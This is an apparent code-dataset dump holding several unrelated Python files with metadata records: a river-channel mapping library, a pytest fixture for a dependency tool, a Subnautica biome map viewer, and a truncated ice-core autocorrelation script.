union\n jump = outline.difference(both_channels) # gaps between the channels\n bar = ch1.difference(ch2) # the (point) bars are the difference between ch1 and ch2\n bar = bar.union(jump) # add gaps to bars\n erosion = ch2.difference(ch1) # erosion is the difference between ch2 and ch1\n bar_no_cutoff = list(bar.geoms) # create list of bars (cutoffs will be removed later)\n erosion_no_cutoff = list(erosion.geoms) # create list of eroded areas (cutoffs will be removed later)\n if type(jump)==MultiPolygon: # create list of gap polygons (if there is more than one gap)\n jump_no_cutoff = list(jump.geoms)\n else:\n jump_no_cutoff = jump\n cutoffs = []\n for b in bar.geoms:\n if b.area>cutoff_area:\n bar_no_cutoff.remove(b) # remove cutoff from list of bars\n for e in erosion.geoms: # remove 'fake' erosion related to cutoffs\n if b.intersects(e): # if bar intersects erosional area\n if type(b.intersection(e))==MultiLineString:\n erosion_no_cutoff.remove(e)\n # deal with gaps between channels:\n if type(jump)==MultiPolygon:\n for j in jump.geoms:\n if b.intersects(j):\n if (type(j.intersection(b))==Polygon) & (j.area>0.3*cutoff_area):\n jump_no_cutoff.remove(j) # remove cutoff-related gap from list of gaps\n cutoffs.append(b.symmetric_difference(b.intersection(j))) # collect cutoff\n if type(jump)==Polygon:\n if b.intersects(jump):\n if type(jump.intersection(b))==Polygon:\n jump_no_cutoff = []\n cutoffs.append(b.symmetric_difference(b.intersection(jump))) # collect cutoff\n bar = MultiPolygon(bar_no_cutoff)\n erosion = MultiPolygon(erosion_no_cutoff)\n if type(jump_no_cutoff)==list:\n jump = MultiPolygon(jump_no_cutoff)\n ch1 = ch1.union(jump)\n eps = 0.1 # this is needed to get rid of 'sliver geometries' - \n ch1 = ch1.buffer(eps, 1, join_style=2).buffer(-eps, 1, join_style=2)\n return ch1, bar, erosion, jump, cutoffs\n\ndef compute_s_coord(x,y): \n dx = np.diff(x); dy = np.diff(y) \n ds = np.sqrt(dx**2+dy**2)\n s = np.hstack((0,np.cumsum(ds)))\n return dx, dy, ds, s\n\n\ndef create_channel_segment_polygons(x, y, rbx, rby, lbx, lby, lbw, rbw, deltas, extra_width):\n x1 = x.copy()\n y1 = y.copy()\n x2 = x.copy()\n y2 = y.copy()\n dx,dy,ds,s = compute_s_coord(x,y)\n\n # x1,x2,y1,y2 are coordinates of points that are extra_width * deltas m beyond the channel banks on both sides:\n x1[1:-1] = x[1:-1] - (lbw[1:-1]+extra_width)*(dy[1:]+dy[:-1])/deltas # left bank\n y1[1:-1] = y[1:-1] + (lbw[1:-1]+extra_width)*(dx[1:]+dx[:-1])/deltas # left bank\n x2[1:-1] = x[1:-1] + (rbw[1:-1]+extra_width)*(dy[1:]+dy[:-1])/deltas # right bank\n y2[1:-1] = y[1:-1] - (rbw[1:-1]+extra_width)*(dx[1:]+dx[:-1])/deltas # right bank\n x1[0] = x[0] - (lbw[0]+extra_width)*dy[0]/deltas # first point\n y1[0] = y[0] + (lbw[0]+extra_width)*dx[0]/deltas\n x2[0] = x[0] + (rbw[0]+extra_width)*dy[0]/deltas\n y2[0] = y[0] - (rbw[0]+extra_width)*dx[0]/deltas \n x1[-1] = x[-1] - (lbw[-1]+extra_width)*dy[-1]/deltas # last point\n y1[-1] = y[-1] + (lbw[-1]+extra_width)*dx[-1]/deltas\n x2[-1] = x[-1] + (rbw[-1]+extra_width)*dy[-1]/deltas\n y2[-1] = y[-1] - (rbw[-1]+extra_width)*dx[-1]/deltas\n\n polys = []\n cline = LineString(np.vstack((x,y)).T) # create linestring from centerline\n for i in trange(0,len(x1)-1):\n # create polygon:\n poly = Polygon(LinearRing([[x2[i],y2[i]],[x2[i+1],y2[i+1]],[x1[i+1],y1[i+1]],[x1[i],y1[i]]]))\n if not poly.is_valid: # if there are no self-intersections, the polygon is already 'fixed'\n fixed_polys = get_rid_of_self_intersections(poly) # otherwise remove self intersections\n fixed_polys1 = [] # 'fixed_polys' is a generator, but we need a list\n for fpoly in fixed_polys:\n fixed_polys1.append(fpoly)\n # select the polygon that intersects the centerline, get rid of the other one:\n if (fixed_polys1[0].intersects(cline)) and (not fixed_polys1[1].intersects(cline)):\n poly = fixed_polys1[0]\n if (not fixed_polys1[0].intersects(cline)) and (fixed_polys1[1].intersects(cline)): \n poly = fixed_polys1[1]\n # if both polygons intersect the centerline:\n if (fixed_polys1[0].intersects(cline)) and (fixed_polys1[1].intersects(cline)):\n if fixed_polys1[0].intersects(prev_poly):\n poly = fixed_polys1[0]\n else:\n poly = fixed_polys1[1]\n # if fixed_polys1[0].area > fixed_polys1[1].area:\n # poly = fixed_polys1[0]\n # else:\n # poly = fixed_polys1[1]\n prev_poly = poly # store current polygon\n polys.append(poly)\n\n # create channel polygon:\n coords = []\n xm = np.hstack((lbx,rbx[::-1]))\n ym = np.hstack((lby,rby[::-1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = Polygon(LinearRing(coords))\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x,y)\n ax.plot(rbx,rby,'k')\n ax.plot(lbx,lby,'k')\n # plot all polygons:\n for poly in polys:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='k'))\n plt.axis('equal')\n return polys\n\ndef estimate_half_widths(x, y, rbx, lbx, rby, lby):\n # do the corelation (this will take a few seconds):\n pr,qr,smr = correlate_curves(x,rbx,y,rby)\n pl,ql,sml = correlate_curves(x,lbx,y,lby)\n pnr = np.delete(np.array(pr),np.where(np.diff(pr)==0)[0]+1)\n qnr = np.delete(np.array(qr),np.where(np.diff(pr)==0)[0]+1)\n pnl = np.delete(np.array(pl),np.where(np.diff(pl)==0)[0]+1)\n qnl = np.delete(np.array(ql),np.where(np.diff(pl)==0)[0]+1)\n # find left- and right-widths:\n rbw = smr[pnr,qnr]\n lbw = sml[pnl,qnl]\n # rbw and lbw are flipped relative to the centerline, so they need to be inverted:\n rbw = rbw[::-1]\n lbw = lbw[::-1]\n # plotting for QC:\n plt.figure()\n plt.plot(rbx,rby,'k')\n plt.plot(lbx,lby,'k')\n plt.plot(x,y,'r')\n for i in range(len(pnr)):\n plt.plot([x[pnr[i]], rbx[qnr[i]]], [y[pnr[i]], rby[qnr[i]]], 'b', linewidth = 0.5 )\n for i in range(len(pnl)):\n plt.plot([x[pnl[i]], lbx[qnl[i]]], [y[pnl[i]], lby[qnl[i]]], 'r', linewidth = 0.5 )\n plt.axis('equal');\n return rbw, lbw, pnr, qnr, pnl, qnl\n\ndef crop_polygons_to_channel_width(polys, ch):\n cropped_polys = [] # list for polygons that are cropped to the actual channel width\n for poly in tqdm(polys):\n cropped_polys.append(poly.intersection(ch)) # cropping\n\n # remove objects that are not polygons or multipolygons: \n polys_to_be_removed = []\n # ind = 0 \n for poly in cropped_polys: \n if (type(poly)!=Polygon) & (type(poly)!=MultiPolygon):\n polys_to_be_removed.append(poly)\n if poly.area<1.0:\n polys_to_be_removed.append(poly) \n # ind += 1\n cropped_polys = [poly for poly in cropped_polys if poly not in polys_to_be_removed]\n\n\n # remove unnecessary small bits that are in multipolygons:\n for i in range(len(cropped_polys)):\n if type(cropped_polys[i])==MultiPolygon:\n polys_temp = list(cropped_polys[i])\n if polys_temp[0].area>=polys_temp[1].area:\n cropped_polys[i] = polys_temp[0]\n else:\n cropped_polys[i] = polys_temp[1]\n\n # for poly in cropped_polys:\n # if poly.area<1.0:\n # cropped_polys.remove(poly)\n return cropped_polys\n\ndef find_overlapping_polys(polys,crit_area):\n \"\"\"function for finding overlapping polygons\"\"\"\n inds = []\n ind = 0\n pbar = tqdm(total = len(polys)/5)\n while ind<len(polys)-50: # look at 50 consecutive polygons at a time (otherwise it takes a long time)\n for ind1,ind2 in itertools.combinations(np.arange(ind,ind+50), 2):\n geom1 = polys[ind1]\n geom2 = polys[ind2]\n if geom1.intersection(geom2).area>crit_area:\n inds.append(ind1)\n inds.append(ind2)\n ind = ind+5\n pbar.update(1)\n inds = np.array(inds)\n inds = np.unique(inds)\n return inds\n\ndef repolygonize_bend(cropped_polys, cropped_polys_new, i1, i2, pad, crit_dist, new_poly_inds, x, y):\n \"\"\"function for generating new, non-overlapping polygons in sharp bends\n inputs:\n cropped_polys - list of polygons that describe the channel\n cropped_polys_new - list of new polygons that do not overlap\n i1 - index of starting point of segment with overlapping polygons\n i2 - index of ending point of segment with overlapping polygons\n pad - number of polygons you want the segment to be padded with\n new_poly_inds - indices of fixed polygons\n x - \n y - \n outputs:\n bend - polygon that describes the fixed segment\n x1 - new x coordinates of the (fixed) left bank\n x2 - new x coordinates of the (fixed) right bank\n y1 - new y coordinates of the (fixed) left bank\n y2 - new y coordinates of the (fixed) right bank\n \"\"\"\n \n # bend = cropped_polys[i1-pad] # start bend with first polygon\n # count = 1\n # for poly in cropped_polys[i1-pad+1:i2+pad]: # add all the polygons to the bend\n # bend = bend.union(poly)\n # count = count+1\n\n bend = unary_union(cropped_polys[i1-pad:i2+pad])\n count = len(cropped_polys[i1-pad:i2+pad])\n\n eps = 0.1 # this is needed to get rid of 'sliver geometries' \n bend = bend.buffer(eps, 1, join_style=2).buffer(-eps, 1, join_style=2)\n \n xbend = bend.exterior.xy[0] # x coordinates of polygon that describes the bend\n ybend = bend.exterior.xy[1] # y coordinates of polygon that describes the bend\n dx, dy, ds, s = compute_s_coord(xbend,ybend) # get distances between consecutive points\n \n if len(np.where(np.abs(ds)>crit_dist)[0])==2: # if 'xbend' starts at a 'corner' point of the bend\n ind1,ind2 = np.where(np.abs(ds)>crit_dist)[0]\n else: # if 'xbend' does not start at a 'corner' point of the bend\n ind1,ind2,ind3 = np.where(np.abs(ds)>crit_dist)[0] \n # ind1, ind2 are the indices where 'xbend' and 'ybend' switch from one bank to the other\n\n # coordinates of the right bank:\n b1_rbx = np.hstack((xbend[ind2+1:],xbend[1:ind1+1]))\n b1_rby = np.hstack((ybend[ind2+1:],ybend[1:ind1+1]))\n\n # coordinates of the left bank:\n b1_lbx = xbend[ind1+1:ind2+1]\n b1_lby = ybend[ind1+1:ind2+1]\n\n # resample left bank:\n tck, u = scipy.interpolate.splprep([b1_lbx,b1_lby],s=1) # parametric spline representation of curve\n unew = np.linspace(0,1,count+1) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n b1_lbxs = out[0]\n b1_lbys = out[1]\n\n # resample right bank:\n tck, u = scipy.interpolate.splprep([b1_rbx,b1_rby],s=1) # parametric spline representation of curve\n unew = np.linspace(0,1,count+1) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n b1_rbxs = out[0]\n b1_rbys = out[1]\n\n direction_flag = 0 # if direction of banks is same as that of flow\n x1 = b1_lbxs\n x2 = b1_rbxs[::-1]\n y1 = b1_lbys\n y2 = b1_rbys[::-1]\n \n dx1 = x1[-1]-x1[0]\n dy1 = y1[-1]-y1[0]\n dx = x[i2]-x[i1]\n dy = y[i2]-y[i1]\n \n # if direction of banks is flipped relative to flow, the coordinate arrays need to be flipped:\n if np.sign(dy1) != np.sign(dy):\n direction_flag = 1\n x1 = x1[::-1]\n x2 = x2[::-1]\n y1 = y1[::-1]\n y2 = y2[::-1]\n\n new_polys = [] # create new polygons for the bend\n for i in range(0,len(b1_lbxs)-1):\n if direction_flag == 0: # direction of banks is same as that of flow\n poly = Polygon(LinearRing([[x1[i+1],y1[i+1]],[x2[i+1],y2[i+1]],[x2[i],y2[i]],[x1[i],y1[i]]]))\n else: # direction of banks is flipped relative to flow\n poly = Polygon(LinearRing([[x2[i+1],y2[i+1]],[x1[i+1],y1[i+1]],[x1[i],y1[i]],[x2[i],y2[i]]]))\n new_polys.append(poly)\n\n # plot bend and new bend polygons:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for poly in cropped_polys[i1-pad+1:i2+pad]:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='b'))\n for poly in new_polys:\n ax.add_patch(PolygonPatch(poly,facecolor='none',edgecolor='r'))\n plt.axis('equal');\n \n plt.plot(xbend,ybend,'k.')\n plt.plot(xbend[ind1],ybend[ind1],'ro')\n plt.plot(xbend[ind2],ybend[ind2],'bo')\n if len(np.where(np.abs(ds)>100)[0])>2:\n plt.plot(xbend[ind3],ybend[ind3],'go')\n \n count = 0\n for i in np.arange(i1-pad,i2+pad):\n cropped_polys_new[i] = new_polys[i-(i1-pad)]\n new_poly_inds.append(i)\n count = count+1\n \n return bend, x1, x2, y1, y2\n\ndef simplify_polygon(poly, deltas):\n x1 = np.array(poly.exterior.xy[0])\n y1 = np.array(poly.exterior.xy[1])\n dx, dy, ds, s = compute_s_coord(x1,y1)\n ds_inds = np.where(ds>4*deltas)[0]\n corner_inds = np.sort(np.hstack((ds_inds,ds_inds+1)))\n x1 = x1[corner_inds]\n y1 = y1[corner_inds]\n dx, dy, ds, s = compute_s_coord(x1,y1)\n while len(np.where(ds==0)[0])>0: # eliminate duplicate points\n zero_ind = np.where(ds==0)[0][0]\n x1 = np.hstack((x1[:zero_ind], x1[zero_ind+1:]))\n y1 = np.hstack((y1[:zero_ind], y1[zero_ind+1:]))\n dx, dy, ds, s = compute_s_coord(x1,y1)\n poly = Polygon(LinearRing(np.vstack((x1,y1)).T))\n return poly\n\ndef simplify_all_polygons(polys, deltas):\n for i in range(len(polys)):\n poly = polys[i]\n if type(poly)==Polygon:\n if len(poly.exterior.xy[0])>5: # if polygon has more than 4 points\n polys[i] = simplify_polygon(poly, deltas=deltas)\n return polys\n\ndef create_new_bank_coordinates(cropped_polys_new, x, y):\n ds = [] # \n for ind in range(len(cropped_polys_new)):\n poly = cropped_polys_new[ind]\n poly = orient(poly,sign=-1.0)\n x1 = np.array(poly.exterior.xy[0])[0]\n y1 = np.array(poly.exterior.xy[1])[0]\n d = (x1-x[ind])*(y[ind+1]-y[ind])-(y1-y[ind])*(x[ind+1]-x[ind])\n ds.append(d)\n # create new x and y coordinate arrays for the banks\n rbxn = []\n rbyn = []\n lbxn = []\n lbyn = []\n # start with first two points on first polygon:\n poly = cropped_polys_new[0]\n if ds[0]<0:\n rbxn.append(poly.exterior.xy[0][3])\n rbyn.append(poly.exterior.xy[1][3])\n lbxn.append(poly.exterior.xy[0][2])\n lbyn.append(poly.exterior.xy[1][2])\n else:\n rbxn.append(poly.exterior.xy[0][1])\n rbyn.append(poly.exterior.xy[1][1])\n lbxn.append(poly.exterior.xy[0][0])\n lbyn.append(poly.exterior.xy[1][0])\n # then add the rest:\n for i in range(len(cropped_polys_new)):\n poly = cropped_polys_new[i]\n if type(poly)==Polygon:\n poly = orient(poly,sign=-1.0)\n if ds[i]<0:\n rbxn.append(poly.exterior.xy[0][0])\n rbyn.append(poly.exterior.xy[1][0])\n lbxn.append(poly.exterior.xy[0][1])\n lbyn.append(poly.exterior.xy[1][1])\n else:\n rbxn.append(poly.exterior.xy[0][2])\n rbyn.append(poly.exterior.xy[1][2])\n lbxn.append(poly.exterior.xy[0][3])\n lbyn.append(poly.exterior.xy[1][3])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(x,y,'b.-')\n for i in range(len(cropped_polys_new)):\n if type(cropped_polys_new[i])==Polygon:\n ax.add_patch(PolygonPatch(cropped_polys_new[i],facecolor='none',edgecolor='k'))\n plt.plot(rbxn,rbyn,'.-')\n plt.plot(lbxn,lbyn,'.-')\n plt.axis('equal');\n return rbxn, rbyn, lbxn, lbyn\n\ndef get_bti_polys(dates, dirname, ts1, ts2, deltas, W, kl):\n # fw = 'fake width' needed to create wide channel segments\n # read the centerline shapefiles for two timesteps\n date1 = dates[ts1]\n date2 = dates[ts2]\n filename1 = dirname + 'cline_'+date1[:4]\n filename2 = dirname + 'cline_'+date2[:4]\n sf1 = shapefile.Reader(filename1).shapes()\n cl1 = np.array(sf1[0].points)\n sf2 = shapefile.Reader(filename2).shapes()\n cl2 = np.array(sf2[0].points)\n \n x = cl1[:,0]\n y = cl1[:,1]\n xn = cl2[:,0]\n yn = cl2[:,1]\n\n curv, s = compute_curvature(x, y)\n curv = savgol_filter(curv,71,3)\n\n age1 = convert_string_to_date(date1)\n age2 = convert_string_to_date(date2)\n d = age2-age1\n years = d.days/365.0\n migr_rate, migr_sign, p, q = get_migr_rate(x, xn, y, yn, years)\n migr_rate = medfilt(savgol_filter(migr_rate,51,3),kernel_size=5) \n\n f = 0.5\n filename = dirname + 'polys_'+date1[:4]\n sf = shapefile.Reader(filename).shapes()\n polys = []\n for i in range(0,len(sf)):\n poly = np.array(sf[i].points)\n x0 = poly[0,0]; y0 = poly[0,1]; x1 = poly[1,0]; y1 = poly[1,1];\n x2 = poly[2,0]; y2 = poly[2,1]; x3 = poly[3,0]; y3 = poly[3,1];\n xa = (1+f)*x0 - f*x1\n ya = (1+f)*y0 - f*y1\n xb = (1+f)*x1 - f*x0\n yb = (1+f)*y1 - f*y0\n xc = (1+f)*x3 - f*x2\n yc = (1+f)*y3 - f*y2\n xd = (1+f)*x2 - f*x3\n yd = (1+f)*y2 - f*y3\n poly = Polygon(LinearRing([[xa,ya],[xb,yb],[xd,yd],[xc,yc]]))\n polys.append(poly)\n\n bti = W*curv*migr_rate/kl\n return x, xn, y, yn, polys, bti, curv, migr_rate, s\n\nclass Bar:\n def __init__(self,age,scrolls):\n self.age = age\n self.scrolls = scrolls\n def plot(self,ax):\n for scroll in self.scrolls:\n ax.add_patch(ax.add_patch(PolygonPatch(scroll.polygon,edgecolor='k',facecolor=sns.xkcd_rgb[\"light gold\"])))\n plt.axis('equal')\n def plot_bti(self,ax,vmin,vmax,cmap,linewidth,edgecolor):\n for scroll in self.scrolls:\n scroll.plot_bti(ax,vmin,vmax,cmap,linewidth,edgecolor)\n \nclass Scroll:\n def __init__(self,polygon,age,bti_polys):\n self.polygon = polygon\n self.age = age\n self.bti_polys = bti_polys\n self.area = self.polygon.area\n def plot(self,ax):\n ax.add_patch(PolygonPatch(self.polygon,edgecolor='k',facecolor=sns.xkcd_rgb[\"light gold\"]))\n def plot_bti(self,ax,vmin,vmax,cmap,linewidth,edgecolor):\n norm = mpl.colors.Normalize(vmin=vmin,vmax=vmax)\n m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)\n for i in range(len(self.bti_polys)):\n ax.add_patch(PolygonPatch(self.bti_polys[i].polygon,\n facecolor=m.to_rgba(self.bti_polys[i].bti),edgecolor=edgecolor,linewidth=linewidth))\n \nclass BTI_poly:\n def __init__(self,polygon,bti):\n self.polygon = polygon\n self.bti = bti\n self.area = self.polygon.area\n \ndef get_rid_of_self_intersections(poly):\n ext = poly.exterior\n mls = ext.intersection(ext)\n polygons = polygonize(mls)\n return polygons\n\ndef create_bti_polys(scroll,polys,bti):\n sel_polys = [] # polygons that intersect the scroll of interest\n btis = [] # bti values that go with the polygons of interest\n for i in range(len(polys)):\n if polys[i].intersects(scroll):\n sel_polys.append(polys[i])\n btis.append(bti[i+1])\n # some polygons have self-intersections that need to be removed:\n sel_polys_fixed = []\n for poly in sel_polys:\n if poly.is_valid: # if there are no self-intersections, the polygon is already 'fixed'\n sel_polys_fixed.append(poly)\n else: # if there are self-intersections:\n fixed_polys = get_rid_of_self_intersections(poly)\n fixed_polys1 = [] # 'fixed_polys' is a generator, but we need a list\n for fpoly in fixed_polys:\n fixed_polys1.append(fpoly)\n # select the larger polygon:\n if fixed_polys1[0].area>fixed_polys1[1].area:\n sel_polys_fixed.append(fixed_polys1[0])\n else:\n sel_polys_fixed.append(fixed_polys1[1])\n sel_polys = sel_polys_fixed\n # now we are ready to clip the larger polygons in 'sel_polys' to the extent of the scroll:\n bti_polys = []\n for i in range(len(sel_polys)):\n poly = scroll.intersection(sel_polys[i])\n if type(poly)==Polygon:\n bti_polys.append(poly)\n return bti_polys, btis\n\ndef create_bar_hierarchy(bars, cutoffs, dates, all_polys, all_btis):\n scrolls = [] # list of all scroll bar polygons\n ages = []\n areas = []\n eroded_cutoffs = []\n cutoff_ages = []\n for i in range(len(bars)):\n for j in range(len(bars[i])): # bars in time step i\n # if bar does not intersect any of the cutoffs and is larger than 1 square meter:\n if (not bars[i][j].intersects(MultiPolygon(cutoffs[i]))) & (bars[i][j].area>1.0):\n scrolls.append(bars[i][j]) # append bar to list of scrolls\n ages.append(dates[i+1]) # append age of bar to list of ages\n areas.append(bars[i][j].area) # append area of bar to list of areas\n # if bar intersects any of the cutoffs and is larger than 1 square meter:\n elif (bars[i][j].intersects(MultiPolygon(cutoffs[i]))) & (bars[i][j].area>1.0):\n eroded_cutoffs.append(bars[i][j]) # append 'bar' to list of eroded cutoffs \n cutoff_ages.append(dates[i+1]) # append age of 'bar' to list of ages of eroded cutoffs\n Bars = [] # list of bars\n for i in trange(len(bars)):\n age = dates[i+1]\n inds = np.where(np.array(ages)==age)[0]\n scroll_objects = []\n scrolls_same_age = []\n for ind in inds:\n if scrolls[ind].area>1.0:\n scrolls_same_age.append(scrolls[ind])\n for scroll in scrolls_same_age:\n bti_polys, btis = create_bti_polys(scroll, all_polys[i], all_btis[i])\n bti_poly_objects = []\n for j in range(len(bti_polys)):\n bti_poly = BTI_poly(bti_polys[j], btis[j]) # create BTI_poly object\n bti_poly_objects.append(bti_poly)\n scroll_object = Scroll(scroll, age, bti_poly_objects) # create Scroll object\n scroll_objects.append(scroll_object)\n bar = Bar(age, scroll_objects) # create Bar object\n Bars.append(bar) # add bar to the list of bars\n bti_ages = []\n bti_areas = []\n bti_polys = []\n bti_indices = []\n for bar in Bars:\n for scroll in bar.scrolls:\n for bti_poly in scroll.bti_polys:\n bti_ages.append(scroll.age)\n bti_areas.append(bti_poly.area)\n bti_polys.append(bti_poly.polygon)\n bti_indices.append(bti_poly.bti)\n return Bars, bti_ages, bti_areas, bti_polys, bti_indices\n\ndef plot_scroll_bars(bars, cutoffs, dates):\n \"\"\"function for plotting scroll bars colored by age\n :param bars:\n :param cutoffs:\n :param dates:\n \"\"\"\n fig = plt.figure()\n ax = plt.subplot(111)\n cmap = mpl.cm.get_cmap('viridis')\n for i in trange(len(dates)-1):\n color = cmap(i/float(len(dates)-1))\n for b in bars[i]:\n if MultiPolygon(cutoffs[i]).is_valid: # sometimes this is invalid\n if not b.intersects(MultiPolygon(cutoffs[i])):\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n else:\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n plt.axis('equal');\n return fig\n\ndef plot_btis(Bars, lw = 0.1, vmin = -1, vmax = 1):\n \"\"\"function for plotting bar type indices on a map\n\n :param Bars: name of the well (usually this is the UWI)\n :param lw: linewidth to be used when plotting BTI polygons (default is 0.1)\n :param vmin: minimum value for BTI colormap (default is -1.0)\n :param vmax: maximum value for BTI colormap (default is 1.0)\"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes([0.05, 0.05, 0.9, 0.9]) # [left, bottom, width, height]\n # ax = fig.add_subplot(111)\n norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)\n cmap = mpl.cm.RdBu_r\n m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)\n for Bar in tqdm(Bars):\n for scroll in Bar.scrolls:\n for bti_poly in scroll.bti_polys:\n if bti_poly.polygon.area > 1.0:\n ax.add_patch(PolygonPatch(bti_poly.polygon, facecolor=m.to_rgba(bti_poly.bti), linewidth=lw))\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax=cax, orientation='vertical', label='bar type index')\n ax.plot(bti_poly.polygon.exterior.xy[0], bti_poly.polygon.exterior.xy[1], color = 'k', linewidth=lw)\n ax.set_aspect('equal')\n return fig","repo_name":"zsylvester/channelmapper","sub_path":"channelmapper.py","file_name":"channelmapper.py","file_ext":"py","file_size_in_byte":32345,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"} +{"seq_id":"71979239441","text":"try:\n from importlib.resources import path\n\nexcept ImportError:\n from importlib_resources import path # type: ignore\n\nimport pytest\nfrom path import Path\n\nfrom dependencmake.dependency_list import DependencyList\n\n\n@pytest.fixture\ndef temp_directory(tmp_path):\n return Path(tmp_path)\n\n\n@pytest.fixture\ndef subdependencies_temp_directory(temp_directory):\n with path(\"tests.resources.subdependencies\", \"dependencmake.yaml\") as config:\n Path(config).copy(temp_directory)\n\n fetch_directory = (temp_directory / \"dependencmake\" / \"fetch\").makedirs_p()\n (fetch_directory / \"dep11_1d264692d45516dcae4a8f07a847d742\").mkdir_p()\n (fetch_directory / \"dep12_fe8ba562a3f2c89af885e5036f465d4b\").mkdir_p()\n dep1 = (fetch_directory / \"dep1_36e47005e2edb6e84fdb0e2e411bff5a\").mkdir_p()\n (fetch_directory / \"dep21_d1efc308c741bb9421611de57b61aec2\").mkdir_p()\n dep2 = (fetch_directory / \"dep2_4b35bd592421ea9170dfb690d7550744\").mkdir_p()\n\n resource = \"tests.resources.subdependencies.dependencmake.fetch\"\n\n with path(\n f\"{resource}.dep1_36e47005e2edb6e84fdb0e2e411bff5a\",\n \"dependencmake.yaml\",\n ) as config:\n Path(config).copy(dep1)\n\n with path(\n f\"{resource}.dep2_4b35bd592421ea9170dfb690d7550744\",\n \"dependencmake.yaml\",\n ) as config:\n Path(config).copy(dep2)\n\n return temp_directory\n\n\nclass TestDependencyList:\n def test_create_subdependencies(self, subdependencies_temp_directory):\n \"\"\"Create supdependencies.\"\"\"\n with subdependencies_temp_directory:\n dependency_list = DependencyList()\n dependency_list.create_dependencies(subdependencies_temp_directory)\n dependency_list.create_subdependencies()\n\n assert len(dependency_list.dependencies) == 5\n assert dependency_list.dependencies[0].name == \"Dep11\"\n assert dependency_list.dependencies[1].name == \"Dep12\"\n assert dependency_list.dependencies[2].name == \"Dep1\"\n assert dependency_list.dependencies[3].name == \"Dep21\"\n assert dependency_list.dependencies[4].name == \"Dep2\"\n\n def test_fetch_subdependencies(self, mocker, subdependencies_temp_directory):\n \"\"\"Fetch supdependencies.\"\"\"\n mocker.patch(\"dependencmake.dependency.urlretrieve\")\n mocker.patch(\"dependencmake.dependency.unpack_archive\")\n mocked_get_project_data = mocker.patch(\n \"dependencmake.dependency.get_project_data\"\n )\n mocked_get_project_data.return_value = {\"name\": \"Dep\", \"version\": \"1.0.0\"}\n\n with subdependencies_temp_directory:\n dependency_list = DependencyList()\n dependency_list.create_dependencies(subdependencies_temp_directory)\n dependency_list.create_subdependencies()\n dependency_list.fetch()\n","repo_name":"pzehner/dependencmake","sub_path":"tests/test_dependency_list_integration.py","file_name":"test_dependency_list_integration.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1206863766","text":"import pygame\n\nmap_img = pygame.image.load(\"map.png\")\nmap_img = pygame.transform.scale(map_img, (480, 480))\n\npygame.display.set_caption(\"Subnautica Map Tracker\")\n\ndef rgb_to_biome(rgb):\n if rgb == (117, 134, 142):\n return \"Safe Shallows\"\n elif rgb == (175, 225, 126):\n return \"Kelp Forest\"\n elif rgb == (202, 70, 101):\n return \"Grassy Plateaus\"\n elif rgb == (55, 79, 168):\n return \"Mushroom Forest\"\n elif rgb == (158, 144, 213):\n return \"Bulb Zone\"\n elif rgb == (184, 119, 93):\n return \"Underwater Islands\"\n elif rgb == (42, 49, 51):\n return \"Mountains\"\n elif rgb == (225, 82, 255):\n return \"Northern Blood Kelp Zone\"\n elif rgb == (246, 229, 169):\n return \"Dunes\"\n elif rgb == (126, 90, 90):\n return \"Crash Zone\"\n elif rgb == (123, 160, 188):\n return \"Sea Treader's Path\"\n elif rgb == (62, 100, 77):\n return \"Sparse Reef\"\n elif rgb == (90, 21, 0):\n return \"Crag Field\"\n elif rgb == (131, 59, 110):\n return \"Blood Kelp Zone Trench\"\n elif rgb == (70, 146, 187):\n return \"Grand Reef\"\n elif rgb == (0, 0, 0):\n return \"Void\"\n elif rgb == (0, 255, 0):\n return rgb_to_biome(selected)\n else:\n return \"Unknown\"\n\nselected = None\n\npygame.init()\n\ndisplay = pygame.display.set_mode((480, 480))\n\nwhile True:\n display.blit(map_img, (0, 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n color = display.get_at(pygame.mouse.get_pos())[:3]\n\n print(f\"Biome: {rgb_to_biome(color)}\")\n\n pixels = pygame.PixelArray(map_img)\n\n if selected:\n pixels.replace((0, 255, 0), selected)\n\n pixels.replace(color, (0, 255, 0))\n del pixels\n\n selected = color\n\n pygame.display.update()","repo_name":"SolarWindss/Python","sub_path":"TOOLS/FORMAL/Subnautica Map Tracker/V1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18933162070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nIce core ACF\nCreated on Wed May 19 14:05:10 2021\n\n@author: lizz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nfrom statsmodels.graphics import tsaplots\n\n\n## Read in Greenland time series\ncore_accum_fpath = '/Users/lizz/Documents/GitHub/Data_unsynced/Ice_core_accum/Andersen_etal_2006_Annual_Accumulation_22Mar2011-trimmed.csv'\n\ncore_tseries = pd.read_csv(core_accum_fpath, index_col=0, parse_dates=[0])\ncore_names = core_tseries.columns\n\nseries_to_test = core_tseries\ncore_to_test = core_names[3]\n\n## Pre-process data\nanomaly_series = series_to_test - series_to_test.mean()\n\ntest_series = anomaly_series[core_to_test][~np.isnan(anomaly_series[core_to_test])]\n\nfig, ax = plt.subplots()\ntsaplots.plot_acf(test_series, ax=ax, lags=100, zero=False)\nax.set(xlabel='Lag [yr]', ylabel='Autocorr.', 